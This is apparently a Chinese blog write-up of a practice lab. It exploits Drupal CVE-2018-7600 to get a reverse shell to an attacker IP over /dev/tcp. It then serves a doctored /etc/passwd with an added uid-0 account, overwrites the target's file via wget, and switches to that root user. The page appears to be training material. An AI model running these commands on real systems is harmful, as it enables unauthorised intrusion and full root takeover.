当前位置: 首页 > news >正文

靶场1

进入kali root权限

  • 反弹一个shell
    攻击机监听:
    nc -lvnp 10000
    目的主机:
    python3 drupa7-CVE-2018-7600.py http://210.26.72.210/drupal/ -c "bash -c 'bash -i >& /dev/tcp/210.26.72.230/10000 0>&1'"

  • 进入目标主机的命令行界面(Shell 环境)
    www-data@hackNos:/var/www/html/drupal$

  • 目标主机的命令行界面:
    cat passwd
    cat /etc/passwd
    攻击机:
    openssl passwd -1 -salt wyr 密码 生成密文
    cd /home
    mkdir wyr
    cd wyr
    touch passwd
    vim passwd(copy 目标主机文件/etc/passwd 最后一行加上wyr:$1$wyr$A20hHuKW8gs4c6LVmb270/:0:0:root:/root:/bin/bash)
    python3 -m http.server 9001

  • 目标主机的命令行界面:
    cd /etc
    wget http://210.26.72.230:9001/passwd -O /etc/passwd
    wget http://210.26.72.230:9001/passwd -O /var/www/html/drupal
    渗透测试中获取基础反向 shell 后(如通过 nc、bash 等方式),通常会立即执行这条命令,将 shell 升级为全交互模式:
    python3 -c 'import pty;pty.spawn("/bin/bash")'

  • su wyr

http://www.hskmm.com/?act=detail&tid=15927

相关文章:

  • 299、已凉
  • linux手动安装阿里云Logtail采集Nginx访问日志
  • WPF的数据绑定之通知修改
  • 古代史
  • matlab运行时遇到的license问题
  • HarmonyOS 5.0+ 安全加密与数据存储最佳实践指南
  • EV论文修改工作
  • HarmonyOS之设备硬件能力调用:传感器、蓝牙与定位
  • 基于HarmonyOS SDK开放能力的微博社交体验构建实践
  • web三维
  • HarmonyOS 多线程编程:Worker 使用与性能优化指南
  • 质数(埃氏筛、欧拉筛)
  • HarmonyOS数据持久化:Preferences轻量级存储实战
  • HarmonyOS服务卡片开发:动态卡片与数据绑定实战指南
  • 有理数类的问题回答
  • HarmonyOS后台任务调度:JobScheduler与WorkManager实战指南
  • 总线传输的四个阶段
  • HarmonyOS事件订阅与通知:后台事件处理
  • HarmonyOS后台任务管理:短时与长时任务实战指南
  • Kali Linux 2025.3 发布 (Vagrant Nexmon) - 领先的渗透测试发行版
  • C语言多线程同步详解:从互斥锁到条件变量
  • Browser Use调用浏览器入门
  • 安防视频监控新时代:国标GB28181平台EasyGBS的可视化首页如何重塑运维与管理体验?
  • LazyForEach性能优化:解决长列表卡顿问题
  • java函数式编程的学习01
  • Manim实现镜面反射特效
  • 25Java基础之IO(二)
  • 【P2860】[USACO06JAN] Redundant Paths G - Harvey
  • GUI软件构造
  • 企业微信客服API模式接入第三方客服系统,对接大模型AI智能体